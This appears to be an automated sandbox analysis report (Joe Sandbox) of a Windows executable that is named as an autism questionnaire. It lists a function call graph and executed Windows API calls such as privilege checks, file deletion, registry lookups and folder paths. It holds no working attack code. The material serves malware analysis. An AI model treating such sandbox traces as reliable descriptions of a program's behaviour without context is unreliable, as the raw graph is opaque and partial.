19900 6b94bb ReleaseMutex CloseHandle 19901 6b94cd 19900->19901 19901->19792 19911 5c6ffb GetCommandLineW 19910->19911 19912 5c6fd7 GetModuleFileNameW 19910->19912 19920 5c7002 19911->19920 19913 40a350 12 API calls 19912->19913 19914 5c6ff9 19913->19914 19918 40a1c8 12 API calls 19914->19918 19915 5c7008 19916 40a1c8 12 API calls 19915->19916 19919 5c7010 19916->19919 19917 5c6e00 12 API calls 19917->19920 19921 5c7044 19918->19921 19922 40a5a8 12 API calls 19919->19922 19920->19915 19920->19917 19920->19919 19923 5cbfb8 19921->19923 19922->19914 19924 5cbfc2 19923->19924 19926 5cc007 19924->19926 21359 5cbf3c GetLastError 19924->21359 19926->19791 19928 5cbf64 19927->19928 19929 5cbf74 19928->19929 19930 5cbe88 106 API calls 19928->19930 19929->19798 19930->19929 19932 5b8250 14 API calls 19931->19932 19933 6b89ce ShowWindow 19932->19933 19934 6af824 67 API calls 19933->19934 19935 6b89f6 19934->19935 19936 5c745c GetSystemDirectoryW 19935->19936 19937 6b89fe 19936->19937 21362 424020 19937->21362 19939 6b8a06 19940 5c6fb0 14 API calls 19939->19940 19941 6b8a10 19940->19941 19942 40a5a8 12 API calls 19941->19942 19943 6b8a1d 19942->19943 21365 6b6c80 19943->21365 19946 5c4f90 12 API calls 19947 6b8a34 19946->19947 19948 40a5a8 12 API calls 19947->19948 19949 6b8a41 19948->19949 19950 5c4f90 12 API calls 19949->19950 19951 6b8a53 19950->19951 19952 40a5a8 12 API calls 19951->19952 19953 6b8a60 19952->19953 19954 5cbfb8 107 API calls 19953->19954 19955 6b8a78 19954->19955 19956 5cbf50 106 API calls 19955->19956 19957 6b8ab2 19956->19957 19958 6b8acb 19957->19958 19959 6b8abb 19957->19959 19961 5cd6bc 108 API calls 19958->19961 19960 5cd6bc 108 API calls 19959->19960 19962 6b8ac9 19960->19962 19961->19962 19962->19787 19964 5c6e2b 19963->19964 19965 40a350 12 API calls 19964->19965 19966 5c6e38 19965->19966 19973 40a774 19966->19973 19968 5c6e40 19969 40a5a8 12 API calls 19968->19969 19970 5c6e58 19969->19970 19971 40a1c8 12 API calls 19970->19971 19972 5c6e80 
19971->19972 19972->19848 19975 40a6ec 19973->19975 19974 40a727 19974->19968 19975->19974 19976 406f28 12 API calls 19975->19976 19976->19974 20128 5c7f24 19977->20128 19980 6af83c 20134 407384 QueryPerformanceCounter 19980->20134 19983 6af850 19984 413e90 CreateMutexW 19983->19984 19984->19868 19987 5b870a 19985->19987 19988 5b8717 MsgWaitForMultipleObjects 19987->19988 20249 5b85f0 PeekMessageW 19987->20249 19988->19870 19988->19871 19990 5c4fba 19989->19990 19991 5c4fce 19990->19991 19992 5c4fc0 19990->19992 19993 40b698 12 API calls 19991->19993 19994 40b4c8 12 API calls 19992->19994 19996 5c4fe1 19993->19996 19995 5c4fcc 19994->19995 19998 40a1c8 12 API calls 19995->19998 19997 40b4c8 12 API calls 19996->19997 19997->19995 19999 5c5003 19998->19999 19999->19880 20445 40b278 20000->20445 20003 5c6871 20003->19886 20003->19887 20447 5cd52c 20004->20447 20007 5c685c GetFileAttributesW 20008 5cd6d7 20007->20008 20009 5cd6fe 20008->20009 20451 429044 20008->20451 20011 5cbfb8 107 API calls 20009->20011 20014 5cd712 20011->20014 20016 5cd747 20014->20016 20465 5cd54c 20014->20465 20017 5cd761 20016->20017 20018 5cd54c 12 API calls 20016->20018 20019 5cd77b 20017->20019 20020 5cd54c 12 API calls 20017->20020 20018->20017 20021 5cd54c 12 API calls 20019->20021 20023 5cd79a 20019->20023 20020->20019 20021->20023 20022 5cd7d7 20470 5cd600 20022->20470 20023->20022 20024 5cd54c 12 API calls 20023->20024 20024->20022 20027 406f28 12 API calls 20028 5cd7f6 20027->20028 20028->19890 20099 40b278 20098->20099 20100 423a2d DeleteFileW 20099->20100 20101 423a75 20100->20101 20102 423a3f GetLastError GetFileAttributesW 20100->20102 20101->19892 20103 423a51 20102->20103 20104 423a6f SetLastError 20102->20104 20103->20104 20105 423a5a 20103->20105 20104->20101 20106 423a61 RemoveDirectoryW 20105->20106 20106->20101 20108 5c6fb0 14 API calls 20107->20108 20109 6b90b9 20108->20109 20110 429d18 48 API calls 20109->20110 20111 6b90be 20110->20111 20112 6b9103 20111->20112 20113 
6b90c3 20111->20113 20115 60d8b0 126 API calls 20112->20115 21172 5c5428 20113->21172 20116 6b90f3 20115->20116 20118 40a228 12 API calls 20116->20118 20120 6b9129 20118->20120 20120->19900 20120->19901 20121 6b90d6 21191 6b8f64 20121->21191 20137 5c7ce0 20128->20137 20130 5c7f2e 20130->19980 20131 5c7f30 20130->20131 20132 5c7ce0 65 API calls 20131->20132 20133 5c7f3a 20132->20133 20133->19980 20135 407391 GetTickCount 20134->20135 20136 40739f 20134->20136 20135->20136 20136->19983 20162 429d18 20137->20162 20140 5c7cfd AllocateAndInitializeSid 20141 5c7cf4 20140->20141 20142 5c7d2f GetVersion 20140->20142 20141->20130 20143 5c7d4f GetModuleHandleW 20142->20143 20144 5c7d66 20142->20144 20145 414020 14 API calls 20143->20145 20146 5c7d8d GetCurrentThread OpenThreadToken 20144->20146 20147 5c7d6a CheckTokenMembership 20144->20147 20148 5c7d64 20145->20148 20151 5c7dde GetTokenInformation 20146->20151 20152 5c7da9 GetLastError 20146->20152 20149 5c7d7e 20147->20149 20150 5c7eb4 FreeSid 20147->20150 20148->20144 20149->20150 20150->20130 20153 5c7e08 GetLastError 20151->20153 20154 5c7e21 20151->20154 20152->20141 20155 5c7dbf GetCurrentProcess OpenProcessToken 20152->20155 20153->20141 20153->20154 20156 5c7e29 GetTokenInformation 20154->20156 20155->20141 20155->20151 20156->20141 20160 5c7e53 20156->20160 20157 5c7e84 20159 406f28 12 API calls 20157->20159 20158 5c7e60 EqualSid 20158->20160 20161 5c7ea3 CloseHandle 20159->20161 20160->20157 20160->20158 20161->20130 20163 429d21 20162->20163 20164 429d26 20162->20164 20166 429cc8 20163->20166 20164->20140 20164->20141 20173 408d70 20166->20173 20169 429cf4 20183 408ff8 20169->20183 20174 408d86 20173->20174 20175 408d7f 20173->20175 20194 40909c 20174->20194 20191 407068 20175->20191 20181 429c68 GetVersionExW 20182 429c9d 20181->20182 20182->20169 20184 409004 20183->20184 20185 40900b 20183->20185 20186 407068 12 API calls 20184->20186 20187 40909c 33 API calls 20185->20187 20186->20185 20188 409012 
20187->20188 20240 408fb0 20188->20240 20192 40701c 12 API calls 20191->20192 20193 40707b 20192->20193 20193->20174 20195 408d8d 20194->20195 20196 4090ba 20194->20196 20200 408e18 20195->20200 20215 408ccc 20196->20215 20199 405d88 10 API calls 20199->20195 20208 408e26 20200->20208 20202 408d94 20202->20169 20202->20181 20203 408e4f GetTickCount 20203->20208 20204 408e67 GetTickCount 20204->20202 20204->20208 20205 408ec1 GetTickCount 20205->20202 20205->20208 20206 408ef8 GetTickCount 20236 40901c 20206->20236 20208->20202 20208->20203 20208->20204 20208->20205 20208->20206 20209 408e96 GetCurrentThreadId 20208->20209 20224 4092d8 GetCurrentThreadId 20208->20224 20229 408af8 20208->20229 20209->20202 20211 408f22 GetTickCount 20212 408f08 20211->20212 20212->20206 20212->20211 20213 408f8c 20212->20213 20213->20202 20214 408f92 GetCurrentThreadId 20213->20214 20214->20202 20216 408cda 20215->20216 20217 408cd5 20215->20217 20219 408d14 20216->20219 20220 408d08 20216->20220 20218 408bb4 15 API calls 20217->20218 20218->20216 20222 406298 10 API calls 20219->20222 20221 406298 10 API calls 20220->20221 20223 408d12 20221->20223 20222->20223 20223->20195 20223->20199 20225 4092e5 20224->20225 20226 4092ec 20224->20226 20225->20208 20227 409313 20226->20227 20228 409300 GetCurrentThreadId 20226->20228 20227->20208 20228->20227 20230 408b03 20229->20230 20231 408b51 20230->20231 20232 408b32 20230->20232 20233 408b29 Sleep 20230->20233 20231->20208 20234 408b41 Sleep 20232->20234 20235 408b4a SwitchToThread 20232->20235 20233->20231 20234->20231 20235->20231 20237 409075 20236->20237 20239 40902e 20236->20239 20237->20212 20238 40905c Sleep 20238->20239 20239->20237 20239->20238 20245 408cb4 GetCurrentThreadId 20240->20245 20243 40901c Sleep 20244 408fe7 20243->20244 20244->20164 20246 408cc1 20245->20246 20247 408cc8 20245->20247 20248 407068 12 API calls 20246->20248 20247->20243 20247->20244 20248->20247 20250 5b8611 20249->20250 20256 5b86f2 20249->20256 20251 
5b8617 IsWindowUnicode 20250->20251 20252 5b8621 20250->20252 20251->20252 20253 5b8648 PeekMessageA 20252->20253 20254 5b8632 PeekMessageW 20252->20254 20255 5b865c 20253->20255 20254->20255 20255->20256 20270 5ba368 GetCapture 20255->20270 20256->19987 20258 5b8697 20258->20256 20277 5b8488 20258->20277 20267 5b86d5 TranslateMessage 20268 5b86ea DispatchMessageA 20267->20268 20269 5b86e2 DispatchMessageW 20267->20269 20268->20256 20269->20256 20271 5ba37d 20270->20271 20274 5ba38f 20270->20274 20271->20274 20303 50e958 20271->20303 20273 5ba3a0 GetParent 20273->20274 20275 5ba39a 20273->20275 20274->20258 20275->20273 20275->20274 20276 50e958 7 API calls 20275->20276 20276->20275 20278 5b849c 20277->20278 20279 5b84b3 20277->20279 20278->20279 20316 5b9948 20278->20316 20279->20256 20281 5b8340 20279->20281 20282 5b838a 20281->20282 20283 5b8350 20281->20283 20282->20256 20285 5b8390 20282->20285 20283->20282 20284 5b8377 TranslateMDISysAccel 20283->20284 20284->20282 20286 5b83ab 20285->20286 20297 5b841d 20285->20297 20287 5b83b6 GetCapture 20286->20287 20286->20297 20288 5b8440 GetWindowThreadProcessId GetWindowThreadProcessId 20287->20288 20292 5b83c1 20287->20292 20289 5b8461 SendMessageW 20288->20289 20288->20297 20289->20297 20290 5b83d2 20293 5b83f8 IsWindowUnicode 20290->20293 20292->20290 20294 5b83db GetParent 20292->20294 20442 50e9b4 20292->20442 20295 5b8402 SendMessageW 20293->20295 20296 5b8421 SendMessageA 20293->20296 20294->20292 20295->20297 20296->20297 20297->20256 20298 5b82f8 20297->20298 20299 5b8309 IsWindowUnicode 20298->20299 20300 5b833d 20298->20300 20301 5b832a IsDialogMessageA 20299->20301 20302 5b8315 IsDialogMessageW 20299->20302 20300->20256 20300->20267 20301->20300 20302->20300 20304 50e963 GetWindowThreadProcessId 20303->20304 20311 50e9aa 20303->20311 20305 50e96e GetCurrentProcessId 20304->20305 20304->20311 20306 50e978 20305->20306 20305->20311 20307 50e982 GlobalFindAtomW 20306->20307 20308 50e991 GetPropW 20307->20308 
20309 50e9a3 20307->20309 20308->20311 20312 50e924 GetCurrentProcessId GetWindowThreadProcessId 20309->20312 20311->20275 20313 50e951 20312->20313 20314 50e93b 20312->20314 20313->20311 20314->20313 20315 50e940 SendMessageW 20314->20315 20315->20313 20317 5b995e 20316->20317 20318 5b9975 20316->20318 20324 5b98d4 20317->20324 20318->20279 20320 5b9965 20333 5b631c 20320->20333 20325 5b9934 20324->20325 20326 5b98e2 20324->20326 20325->20320 20326->20325 20327 5b98f8 IsWindowVisible 20326->20327 20327->20325 20328 5b9902 20327->20328 20329 5b9936 20328->20329 20330 5b9914 20328->20330 20345 5b96e0 20329->20345 20332 5b9921 ShowWindow 20330->20332 20332->20325 20334 5b6328 UnhookWindowsHookEx 20333->20334 20335 5b6333 20333->20335 20334->20335 20336 5b639a 20335->20336 20337 5b6354 SetEvent GetCurrentThreadId 20335->20337 20342 5b9720 20336->20342 20338 5b636c 20337->20338 20339 5b6391 CloseHandle 20337->20339 20340 5b6378 MsgWaitForMultipleObjects 20338->20340 20351 5b871c 20338->20351 20339->20336 20340->20338 20340->20339 20343 5b973d 20342->20343 20344 5b972d KillTimer 20342->20344 20343->20318 20344->20343 20346 5b9720 KillTimer 20345->20346 20347 5b96f0 SetTimer 20346->20347 20348 5b971c 20347->20348 20349 5b9715 20347->20349 20348->20325 20350 5b9948 162 API calls 20349->20350 20350->20348 20352 5b85f0 163 API calls 20351->20352 20353 5b872b 20352->20353 20354 5b8738 20353->20354 20356 5b92c8 20353->20356 20354->20340 20382 5b923c GetCursorPos 20356->20382 20359 5b9311 20385 5b615c 20359->20385 20361 5b9948 160 API calls 20361->20359 20362 5b931b 20393 50ea64 20362->20393 20366 5b9333 20368 5b9379 20366->20368 20375 5b9383 20366->20375 20383 5104f0 114 API calls 20382->20383 20384 5b9251 20383->20384 20384->20359 20384->20361 20386 5b6188 20385->20386 20387 5b6166 20385->20387 20388 40a1c8 12 API calls 20386->20388 20387->20386 20389 5b6174 20387->20389 20390 5b618f 20388->20390 20391 40a5a8 12 API calls 20389->20391 20390->20362 20392 5b6181 20391->20392 
20392->20362 20394 50ea77 20393->20394 20395 50ea88 20394->20395 20396 50ea7d 20394->20396 20398 40b698 12 API calls 20395->20398 20397 40a5a8 12 API calls 20396->20397 20399 50ea86 20397->20399 20398->20399 20400 5b94fc 20399->20400 20401 5b9510 20400->20401 20402 5b9526 20401->20402 20403 40a5a8 12 API calls 20401->20403 20402->20366 20404 5b951c 20403->20404 20404->20402 20405 541b1c 110 API calls 20404->20405 20443 50e958 7 API calls 20442->20443 20444 50e9be 20443->20444 20444->20292 20446 40b27e GetFileAttributesW 20445->20446 20446->20003 20448 5cd537 20447->20448 20449 40a1c8 12 API calls 20448->20449 20450 5cd546 20448->20450 20449->20448 20450->20007 20452 429050 20451->20452 20481 4244f8 20452->20481 20455 40a5a8 12 API calls 20456 429088 20455->20456 20457 40a1c8 12 API calls 20456->20457 20458 42909d 20457->20458 20459 4098c4 20458->20459 20460 4098d2 20459->20460 20461 4098c8 20459->20461 20464 409910 20460->20464 20525 407004 20460->20525 20462 40a034 12 API calls 20461->20462 20462->20460 20528 429008 20465->20528 20467 5cd55d 20468 4098c4 12 API calls 20467->20468 20469 5cd562 20468->20469 20469->20016 20471 5cd60e 20470->20471 20472 5cd54c 12 API calls 20471->20472 20473 5cd627 20471->20473 20472->20473 20474 5cd54c 12 API calls 20473->20474 20475 5cd649 20473->20475 20474->20475 20476 5cd54c 12 API calls 20475->20476 20478 5cd67f 20475->20478 20476->20478 20477 5cd54c 12 API calls 20477->20478 20478->20477 20479 40a350 12 API calls 20478->20479 20480 5cd6b5 20478->20480 20479->20478 20480->20027 20484 424520 20481->20484 20487 424550 20484->20487 20488 424559 20487->20488 20491 4245b9 20488->20491 20500 424408 20488->20500 20490 42462c 20492 40a350 12 API calls 20490->20492 20491->20490 20498 4245d6 20491->20498 20493 424518 20492->20493 20493->20455 20494 424620 20496 40b3f0 12 API calls 20494->20496 20495 40a1c8 12 API calls 20495->20498 20496->20493 20497 40b3f0 12 API calls 20497->20498 20498->20494 20498->20495 20498->20497 20499 424408 105 
API calls 20498->20499 20499->20498 20503 424888 20500->20503 20508 4248db 20503->20508 20509 4248e2 20503->20509 20504 40a228 12 API calls 20505 4252be 20504->20505 20506 40a1c8 12 API calls 20505->20506 20507 424421 20506->20507 20507->20491 20508->20509 20510 423364 59 API calls 20508->20510 20511 42438c 105 API calls 20508->20511 20512 40b29c 12 API calls 20508->20512 20515 423004 20508->20515 20522 423070 20508->20522 20509->20504 20510->20508 20511->20508 20512->20508 20516 42301e 20515->20516 20517 42300e 20515->20517 20519 422bf8 12 API calls 20516->20519 20518 422bf8 12 API calls 20517->20518 20520 42301b 20518->20520 20521 423029 20519->20521 20520->20508 20521->20508 20523 422bf8 12 API calls 20522->20523 20524 423081 20523->20524 20524->20508 20526 41063c 12 API calls 20525->20526 20527 407009 20526->20527 20527->20464 20529 42900f 20528->20529 20530 40a5a8 12 API calls 20529->20530 20531 429027 20530->20531 20531->20467 21173 5c5438 21172->21173 21174 40b698 12 API calls 21173->21174 21175 5c5449 21174->21175 21176 6b8de4 21175->21176 21177 40b4c8 12 API calls 21176->21177 21178 6b8e29 21177->21178 21179 6b8e34 FindFirstFileW 21178->21179 21180 6b8efb 21179->21180 21188 6b8e47 21179->21188 21181 40a228 12 API calls 21180->21181 21182 6b8f18 21181->21182 21183 40a1c8 12 API calls 21182->21183 21184 6b8f20 21183->21184 21184->20121 21185 6b8ec5 FindNextFileW 21186 6b8edd FindClose 21185->21186 21185->21188 21186->20121 21187 40b4c8 12 API calls 21187->21188 21188->21185 21188->21187 21189 423a20 5 API calls 21188->21189 21190 6b8eb7 SetFileAttributesW 21188->21190 21189->21185 21190->21188 21192 40a1c8 12 API calls 21191->21192 21360 5cbe88 106 API calls 21359->21360 21361 5cbf4d 21360->21361 21361->19926 21363 40b278 21362->21363 21364 42402a SetCurrentDirectoryW 21363->21364 21364->19939 21366 5c6fb0 14 API calls 21365->21366 21367 6b6ca9 21366->21367 21368 5c6f50 13 API calls 21367->21368 21378 6b6cbd 21368->21378 21369 6b6e53 21370 40a228 12 API 

                                                                                              Executed Functions

                                                                                              APIs
                                                                                              • AllocateAndInitializeSid.ADVAPI32(00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7D22
                                                                                              • GetVersion.KERNEL32(00000000,005C7ECB,?,00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7D3F
                                                                                              • GetModuleHandleW.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,005C7ECB,?,00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7D59
                                                                                              • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,005C7ECB,?,00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7D74
                                                                                              • FreeSid.ADVAPI32(00000000,005C7ED2,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7EC5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateCheckFreeHandleInitializeMembershipModuleTokenVersion
                                                                                              • String ID: CheckTokenMembership$advapi32.dll
                                                                                              • API String ID: 2691416632-1888249752
                                                                                              • Opcode ID: 78205a2b5bba4b993b19a948a1bb69f4b064863e39af3854e5d28bf474fd5d73
                                                                                              • Instruction ID: 9e47304f2c2519385998e5d426bc562542af73c677c294aaacd6cf1c30b33c32
                                                                                              • Opcode Fuzzy Hash: 78205a2b5bba4b993b19a948a1bb69f4b064863e39af3854e5d28bf474fd5d73
                                                                                              • Instruction Fuzzy Hash: A2514472A0830D6EDB11EAF98D42FBE7BACBF1C705F1044AEF501E6681D6789D408B65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,0040E8B0,?,?), ref: 0040E822
                                                                                              • GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,0040E8B0,?,?), ref: 0040E82B
                                                                                                • Part of subcall function 0040E6A0: FindFirstFileW.KERNEL32(00000000,?,00000000,0040E6FE,?,?), ref: 0040E6D3
                                                                                                • Part of subcall function 0040E6A0: FindClose.KERNEL32(00000000,00000000,?,00000000,0040E6FE,?,?), ref: 0040E6E3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                                                              • String ID:
                                                                                              • API String ID: 3216391948-0
                                                                                              • Opcode ID: 4f4e845a1bd2874fd9ef47becd123c76b58742bb5706f28c9b712a7f9af8110b
                                                                                              • Instruction ID: 1e50cd0e94847efb8cb05e6df71b151ee34378a03d53e12baea26e8823c5d93b
                                                                                              • Opcode Fuzzy Hash: 4f4e845a1bd2874fd9ef47becd123c76b58742bb5706f28c9b712a7f9af8110b
                                                                                              • Instruction Fuzzy Hash: 71114270A002099BDB04EF96D982AAEB3B9EF45304F90487EF904B73C1D7395E148B6D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00000000,0060C313,?,?,?,00000000), ref: 0060C2ED
                                                                                              • GetLastError.KERNEL32(00000000,?,00000000,0060C313,?,?,?,00000000), ref: 0060C2F5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFileFindFirstLast
                                                                                              • String ID:
                                                                                              • API String ID: 873889042-0
                                                                                              • Opcode ID: 48cb86c36632e8c72cb41299c80d55c8f2305584a3cc239000e223bcc48676ca
                                                                                              • Instruction ID: 0e0656a6fbe86c5836fc78b0efda7e26b232c5910eabf30e6ebd6b813bae866c
                                                                                              • Opcode Fuzzy Hash: 48cb86c36632e8c72cb41299c80d55c8f2305584a3cc239000e223bcc48676ca
                                                                                              • Instruction Fuzzy Hash: 1BF0F931A84208ABCB14DFBA9C0189FF7ADEB4533075147BAF814D32D1DB744E004598
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00000000,0040E6FE,?,?), ref: 0040E6D3
                                                                                              • FindClose.KERNEL32(00000000,00000000,?,00000000,0040E6FE,?,?), ref: 0040E6E3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$CloseFileFirst
                                                                                              • String ID:
                                                                                              • API String ID: 2295610775-0
                                                                                              • Opcode ID: 45566dd6d5ea1f2d432aa336e5a60c1e3a8d7bb9a7f17ca8116a3bd58dd3b41d
                                                                                              • Instruction ID: dec86fcb97929b74413189edb203bd87f329489ef31ab21fd3caa719f1a03e71
                                                                                              • Opcode Fuzzy Hash: 45566dd6d5ea1f2d432aa336e5a60c1e3a8d7bb9a7f17ca8116a3bd58dd3b41d
                                                                                              • Instruction Fuzzy Hash: 95F0B430540608AFCB10EBB6DC4295EB3ACEB4431479009B6F400F32D1EB395E10995C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040E4E9,?,?), ref: 0040E2FD
                                                                                              • RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040E4E9,?,?), ref: 0040E346
                                                                                              • RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040E4E9,?,?), ref: 0040E368
                                                                                              • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 0040E386
                                                                                              • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 0040E3A4
                                                                                              • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 0040E3C2
                                                                                              • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 0040E3E0
                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,0040E4CC,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040E4E9), ref: 0040E420
                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,0040E4CC,?,80000001), ref: 0040E44B
                                                                                              • RegCloseKey.ADVAPI32(?,0040E4D3,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,0040E4CC,?,80000001,Software\Embarcadero\Locales), ref: 0040E4C6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Open$QueryValue$CloseFileModuleName
                                                                                              • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                                                                                              • API String ID: 2701450724-3496071916
                                                                                              • Opcode ID: 5aa5f0f4598f069c7b6180d6d0362751deb9bd023370fd1abe4087e628624bde
                                                                                              • Instruction ID: 4455e1c2a3f30db0af6e145a4bce986524b579b5894be5bc8a3c80d05520e853
                                                                                              • Opcode Fuzzy Hash: 5aa5f0f4598f069c7b6180d6d0362751deb9bd023370fd1abe4087e628624bde
                                                                                              • Instruction Fuzzy Hash: 5C51F775A40608BEEB10DAA6CC42FAF77BCDB08704F5044BBBA14F61C2D6789A50DB5D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SHGetKnownFolderPath.SHELL32(006CD7F4,00008000,00000000,?,00000000,006AC586,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A), ref: 006AC434
                                                                                              • CoTaskMemFree.OLE32(?,006AC477,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC46A
                                                                                              • SHGetKnownFolderPath.SHELL32(006CD804,00008000,00000000,?,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC487
                                                                                              • CoTaskMemFree.OLE32(?,006AC4CA,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC4BD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: FolderFreeKnownPathTask
                                                                                              • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                                              • API String ID: 969438705-544719455
                                                                                              • Opcode ID: 7984a636196e105601b5bae3f4cd8b715fa2ccf315e8b131d7c1a39997f32fcf
                                                                                              • Instruction ID: b9958020655176fa4da1f40778f72373ecd7cbade583b9d7093994fb637c8e1d
                                                                                              • Opcode Fuzzy Hash: 7984a636196e105601b5bae3f4cd8b715fa2ccf315e8b131d7c1a39997f32fcf
                                                                                              • Instruction Fuzzy Hash: A281D530E012049FDB10FFA4E852BAD7BA7EB8A714F50447AF400A7395C678AD51CF65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00410CAC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionRaise
                                                                                              • String ID: P\l$p\l
